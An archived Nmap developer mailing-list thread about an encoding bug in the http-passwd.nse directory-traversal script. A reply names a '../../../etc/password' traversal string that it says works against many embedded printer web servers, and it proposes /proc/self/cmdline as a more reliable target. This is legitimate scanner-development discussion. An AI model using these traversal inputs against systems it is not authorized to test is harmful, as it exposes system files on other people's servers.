Nmap Development mailing list archives
Re: hexify() problem in http-passwd.nse
From: Joao Correa <joao () livewire com br>
Date: Sun, 31 May 2009 17:49:17 -0300
Thanks a lot Brandon! Your 30 seconds answer was loud and clear! On Sun, May 31, 2009 at 5:11 PM, Brandon Enright <bmenrigh () ucsd edu> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sun, 31 May 2009 16:47:31 -0300 or thereabouts Joao Correa <joao () livewire com br> wrote:Kris, thanks for you answer and for the reference. My doubt is if, with the http-passwd.nse script, you are trying to retrieve the passwd file directly, or if it is used to retrieve the file as a parameter for the web application, just like descripted in [1]. Considering the source code I can only think about the first option, but in this case we fall on the problem descripted on my first e-mail (I´ve tried to reproduce the scenario here, but the hexed chars were not decoded by the Apache, leading to failure). As mentioned before, when I have removed the hexify function and sent the dir function without special encoding, it worked fine. I don´t think it is the expected behavior. Since the script dates from 2007 and the mentioned RFC dates from 2005, I don´t believe that it is a problem of lost compatibility due to Apache getting fit to the RFC. Have you used the script recently? Which web servers have you tried to exploit? Thanks a lot, João CorreaHey João, sorry that I only have about 30 seconds to reply. The directory transversal script really isn't targeted at mainstream webserver like Apache and IIS. In some really heinous cases I suspect it would work against either, but it works pretty well against all of the hundreds of obscure webservers out there. For example, the ../../../etc/password works against the embedded HTTP server on many HTTP printers. Nevermind that it might violate RFC and best practices, it works on lots of servers. We might think of expanding the script beyond just /etc/password though. I've seen a number attacks recently that check for directory transversal by going after /proc/self/cmdline which seems to be more reliable than things like /etc/password Brandon -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.11 (GNU/Linux) iEYEARECAAYFAkoi5JMACgkQqaGPzAsl94ISUwCgvPQ4v+KcjozOTJsOFbF+O/Wx 6b4An3bwsbIZ8VpdbWOvnGl266fteeKY =OUnF -----END PGP SIGNATURE-----
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://SecLists.Org
Current thread:
- hexify() problem in http-passwd.nse Joao Correa (May 30)
- Re: hexify() problem in http-passwd.nse Joao Correa (May 30)
- Re: hexify() problem in http-passwd.nse Joao Correa (May 30)
- Re: hexify() problem in http-passwd.nse Kris Katterjohn (May 30)
- Message not available
- hexify() problem in http-passwd.nse Joao Correa (May 31)
- Re: hexify() problem in http-passwd.nse Brandon Enright (May 31)
- Re: hexify() problem in http-passwd.nse Joao Correa (May 31)
- Re: hexify() problem in http-passwd.nse Joao Correa (May 30)
- Re: hexify() problem in http-passwd.nse Joao Correa (May 30)